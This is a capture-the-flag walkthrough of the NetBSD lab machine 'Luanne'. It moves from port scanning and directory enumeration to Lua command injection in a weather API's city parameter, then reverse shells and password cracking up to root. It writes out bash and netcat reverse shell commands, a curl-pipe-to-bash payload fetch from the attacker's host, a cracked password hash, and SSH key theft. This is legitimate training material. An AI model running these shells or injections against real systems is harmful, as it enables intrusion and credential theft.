Luanne machine is a vulnerable machine with NetBSD operating system among retired machines. After detecting and using these vulnerabilities, we are expected to obtain user and root flags.
We provide network connection with nmap to recognize the target machine.
Classic Scan
Full Port Scan
As a result of port scanning, 22/tcp ssh OpenSSH 8.0, 80/tcp http nginx 1.19.0, 9001/tcp http Medusa httpd 1.12 ports are open.
Since there is no vulnerability from the ssh side, we continue with port 80.
On port 80, we continue enumeration on the browser since the http protocol is serving.
When trying to log in, it constantly asks for credential information, we tried default apros and could not log in.
We tried to turn it off and try
Here it routes to port 3000
Not much of a result here.
Let’s run a directory and file scan with gobustter.
The directory scan returned the /robots.txt file
We went to the robots.txt directory
Here in the /robots.txt file it is told to do harvesting by /weather.
We perform a goboster scan to this directory
We discovered the /forecast directory.
We go to the /forecast directory.
Here it tells us to use city=list in json format, let’s go to the url section here and apply it
It means we can run something on the server here. The cities are listed
Now we have written the cities one by one
When I typed the city of London, it was very detailed.
We continue to obtain this information.
Since it may be associated with port 9001, let’s go to that port
It asks for credential information on this same page. Since Medusa/1.12 is specifically running on this port, let’s Google whether there is a defulat password or not
Entering this information was not successful
When we looked at a different address, it gave us different credentials and we were able to log in with them
showing uptime, processes, memory. here in the process section, the file with the .lua extension that draws our attention
Let’s go and investigate the lua extension file and find out what it is
We see that lua is a programming language, we can run commands on the web service, if we write revershel about lua, maybe we can get shella on the server.
We searched for Lua related revershell on Google
We are trying on the url we saw to get shell.
We get an error that json cannot parse properly.
Let’s try to execute a command by listening in the background with Burpsuite
We can’t run any kind of command here
Let’s see if there is command injection in Lua
os.execute(“id”)
when we try this, it returns the results of the id value
We type our Revershell command and no result is returned
os.execute(“bash -i >& /dev/tcp/10.10.14.13/1234 0>&1”)
Let’s pass a reveshell file here and trigger it with curl
First, we prepare a revershell file as sh, i.e. bash script
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f
Then we provide a web server with python to access this file
Shell is ready to be taken, now the profitable machine needs to take this shell and run it.
We were able to do command injection in the lua machine, now we open burpsuit and access this command with curl
curl+10.10.14.13:8000/shell.sh+|+bash
This is how we were able to buy Shell 😊
This user has restricted authorization
Let’s do local enumeration
Let’s first carefully examine the www folder, since this web service offers
In the .htapsswd file we get a username and hash.
Let’s see from Creacstation if this hash is cracked.
In the .htapsswd file we get a username and hash.
Let’s see from Creacstation if this hash is cracked.
As can be seen the hashi broke as $1$vVVoNCsOl$lMtBS6GL2upDbR4Owhzyc0:iamthebest
We could not log in because there is no webapi_user user
Here came the credetnail information that he asked us when entering the website, let’s try to log in with this information
We were able to log in
/weather/forecast?city=list
/weather/forecast?city=London
The addresses are the same information we detected in our enumeration part, there was no advantage for us.
We continue with local enumeration. Since it’s sh, we couldn’t run the automatic enumeration tools, which are limited in most cases.
We provide manual enumeration.
We are looking at the running network list
We look at the processes that use these ports
Here we were able to obtain the ssh key.
Now we will make an ssh connection using this ssh key.
The file devel_backup-2020-09-16.tar.gz.enc catches our attention.
We don’t know how to open this file, we are searching on Google
Let’s edit it according to the reference here and print it out
Here we have a different hash value
Let’s break this hash value again with hascat
We cracked the hash value and got the littlebear password
Here I try to enter as a root user, commands such as sudo su do not work because it is an openbsd operating system, we have researched this issue on Google how we can be root dite
We encountered the doas command, let’s try this
As you can see, we were able to get our root flag here.